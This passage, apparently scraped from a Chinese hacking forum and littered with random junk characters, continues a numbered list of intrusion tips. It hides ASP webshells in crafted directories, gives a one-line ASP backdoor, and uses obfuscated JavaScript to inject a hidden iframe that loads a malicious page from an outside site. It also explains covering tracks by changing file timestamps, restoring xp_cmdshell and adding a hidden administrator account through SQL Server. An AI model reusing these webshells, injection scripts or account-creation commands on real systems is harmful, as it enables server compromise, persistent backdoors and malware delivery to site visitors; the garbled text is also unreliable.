$ V; g& ~" o" D$ @8 U用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。- X% |. b6 ?9 @1 b: a
' [4 ]7 q" O7 W1 t# g. |' Y53、隐藏ASP后门的两种方法* ^, L+ b) i' r+ X* g4 D) G
1、建立非标准目录:mkdir images..\
% Z( ?5 H- G; {* _6 I" q拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
, Q) B+ ]$ X2 f7 [8 B, Z# f" ^通过web访问ASP木马:http://ip/images../news.asp?action=login+ x/ ~; E* y) @! z2 J
如何删除非标准目录:rmdir images..\ /s
+ r* Y5 D9 P4 n& ]( Z) q: k2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
: ]1 o+ `" G& ?" f: [( zmkdir programme.asp! [: S6 J8 b, t# o
新建1.txt文件内容:<!--#include file=”12.jpg”-->
: b( Y% P1 A/ h0 c: F新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
) J& }6 I) [8 i/ e+ battrib +H +S programme.asp
3 Y: e# s& C; s& @3 ]$ z通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt( ?% _1 f4 ], I& v! R0 y
; d1 J# q9 {! j7 n2 m) Z. w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
& j) e3 g+ J# m* \ v* w然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。7 |0 R Z% l+ D: N1 b' p: b
2 k* h! C2 k( _% V55、JS隐蔽挂马$ n# n7 R2 {: z2 v2 l0 a' o
1.8 z0 |3 w; x9 n8 D/ k5 w
var tr4c3="<iframe src=ht";5 ^( D* L. _4 R/ b' Q8 {% P, ~
tr4c3 = tr4c3+"tp:/";$ h, {1 J- x5 s, \3 V2 o* Z1 {
tr4c3 = tr4c3+"/ww";
: t6 M8 O/ `: D$ B8 G8 k! p$ T- ?) ltr4c3 = tr4c3+"w.tr4";% p( |; k3 M" N8 B
tr4c3 = tr4c3+"c3.com/inc/m";
, q5 f3 h y7 J* S% K: Etr4c3 = tr4c3+"m.htm style="display:none"></i";/ H7 P( V, W3 w1 Y: J% s) I
tr4c3 =tr4c3+"frame>'";# j" ^5 o6 M% u( `5 o
document.write(tr4c3);
& E' R- D% D9 w1 e避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。# B$ X9 c0 N2 B" x" |
& y$ w. b- r1 M$ L. r+ |0 E, J
2.
' y( ^+ o' l% W6 q% P% z, O$ o" b转换进制,然后用EVAL执行。如; x8 I, F& H8 R+ Q9 S1 `/ e/ e9 _
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
6 @" \! _: f/ z3 O8 t1 C: @) L不过这个有点显眼。8 n9 p8 z/ |, \: ]/ f
3.
$ L% C, G% J3 Y. `7 J, Rdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
; U; p7 Y: F6 }/ A& r最后一点,别忘了把文件的时间也修改下。" v- q( Y. a$ M, ^3 M% m
+ T) a6 ^. Q0 g8 v
56.3389终端入侵常用DOS命令" m# Z; H' _8 K% z2 c9 _
taskkill taskkill /PID 1248 /t
1 I! P" S' y0 c. \1 b% e% H2 V, g" }1 M7 S# b
tasklist 查进程* _: v: y5 j ?! m" }9 W" i
5 \6 ]( O8 ?& E B) Q! B- j
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限' N4 `; ?! R4 ^2 @, i5 \' y2 K
iisreset /reboot6 s# @' W4 g+ m' c1 c0 n
tsshutdn /reboot /delay:1 重起服务器: x! U7 j* D% v2 L+ u
. z3 w% T9 s8 \$ P1 [' d, `
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
! ^8 F/ |, s# Q
/ y, ~4 X6 s. a, `2 Z1 n; u& Fquery user 查看当前终端用户在线情况/ `% _$ w7 G& B# \ x
5 c- G7 i ~, Y: t N( A9 a
要显示有关所有会话使用的进程的信息,请键入:query process *
7 t/ c# H. n. H2 q0 }0 |" L }9 m7 t
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
; n p- F( z3 f* L* ^; t1 m d0 v
/ A) T# M7 u$ d/ { Y% `7 z要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
5 ?, \9 S1 m0 l% o$ n4 ^6 V# q0 w; B O! ^1 P4 T
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02* x5 n& O) ^! d; [7 ^6 m" b- u3 l
# A0 Y, ~+ ~: H T
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
|; w& ?- g. n& V) r! F9 ]# ~
$ q q/ g# M: I* C. ^ ^命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统! Y$ E% ]5 V+ n, P! a
7 O& z' _0 _7 P# m5 X
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
6 K: u+ V1 ?; K9 q1 M% M$ l8 g' `0 R( G
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
1 I) T: K8 Z3 x: {! D6 N p! K
6 B0 p% `4 \2 a. ?+ i56、在地址栏或按Ctrl+O,输入:6 _8 O, g' R# F
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;8 K. `+ N/ R" m8 w) f- H, _
0 W" L3 \6 a4 U; y2 z! ~
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
7 [# _0 H2 j: ~4 e6 H
, L" v' y1 ~6 w3 v) g7 m8 C) l4 [57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
5 J) k6 d& _6 L9 o$ u8 B0 U( ]( \用net localgroup administrators是可以看到管理组下,加了$的用户的。
T! s* w- m: M! A& Q" z. C8 t% }$ y2 M1 O
58、 sa弱口令相关命令: X# [4 w. S L0 E. H
) K9 D) p) ?- I7 }一.更改sa口令方法:
. \# d* Y2 i# X/ l/ \用sql综合利用工具连接后,执行命令:
) s; |' s) a( I% S, Y6 \exec sp_password NULL,'20001001','sa'
9 C, j* C* [1 G(提示:慎用!)
9 \* B X6 \' q' P1 D+ g; K! i. X3 K4 F6 G+ G
二.简单修补sa弱口令.4 m5 F, b6 [3 \+ N5 c
5 @2 c% _. S8 [- l5 d/ _+ V3 `方法1:查询分离器连接后执行:$ h$ l* e( V% g* [$ u
if exists (select * from
+ ` f! [7 s+ E. e( j$ Zdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and. |- P( R3 o& ~$ k% q+ _( ?# m
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)+ M8 `: J3 }# G- w7 v
{8 h3 L) g" b1 D; D
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'" l- @- \5 F& z/ t, _
9 K4 u( [0 S% l" [# q( d( a0 A
GO
# u6 A, ~6 n7 o4 D" A9 m
8 h7 |) ~3 k" [' A" {然后按F5键命令执行完毕+ Z" @( y) r4 X" Q4 b3 b. R
% P3 B9 @' K, G2 {方法2:查询分离器连接后
4 \" ~, \" V7 m& ~第一步执行:use master
. ^% ^8 m/ n# `第二步执行:sp_dropextendedproc 'xp_cmdshell'
7 x$ ]/ w& U v: H然后按F5键命令执行完毕
d1 E( ~8 z) z E( f- z, o, z/ o- w4 j
W! D2 r: g4 v# F1 i; S( R" C" @三.常见情况恢复执行xp_cmdshell.. G$ I: ~! q' l" e! D9 E7 q- \/ G$ J
" C% }8 {+ a7 H" U# R) e0 G! ]8 }
4 `& M( _" O% i# _3 a8 {4 m0 d. L1 未能找到存储过程'master..xpcmdshell'.8 V1 I8 l* }+ a
恢复方法:查询分离器连接后,
/ M- Q+ H) r: I& N" G7 G% z; }$ L第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int5 f. Q, i" L* L s7 R1 C
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ s( P7 C' L/ ^7 Z7 O' E然后按F5键命令执行完毕 D0 Q0 v& v* X9 l+ E6 D8 C
U8 \+ w# y& F2 j2 X
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)6 d8 P; J& _# i
恢复方法:查询分离器连接后,
. W9 {$ u' M+ u# N$ b8 b第一步执行:sp_dropextendedproc "xp_cmdshell"
# ?0 B# {/ Q$ T. W- W& {第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ E, k% o/ g* m
然后按F5键命令执行完毕6 L \1 |3 C. N
) ^* M& f* u4 n) {' o9 \3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)/ e0 z6 k7 A6 G% j
恢复方法:查询分离器连接后,
3 A" d& _# |3 z( r1 Z第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
, V6 x& H$ Q j/ @第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
' ?7 m' H1 j. `. R( e: ]然后按F5键命令执行完毕
7 n/ O; r9 D' r+ z0 s/ m( b/ E0 ^% { T
' ~8 l5 R3 O$ _$ ]+ f" \四.终极方法.: z7 r% h& O8 ]. b( n- O' _( _" h' N
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:) o" W/ o6 x+ M
查询分离器连接后,
/ W0 ^! t. H9 S2000servser系统:
8 y3 Z! L# V2 E$ ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 _$ m8 _, K% q5 K) `
4 H: u5 R! T: h6 G) W; Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. V( c+ q, k! ?! F: {( k @- K q1 N1 k' s- A6 V& M7 g
xp或2003server系统:
$ z: S) w7 C4 P" B. [
D4 e9 f7 }& e8 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ b' P2 ^, v# A0 v4 \
7 { v# R6 D& Y; r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% V# ` b% X+ V5 t: ]% N0 D- W |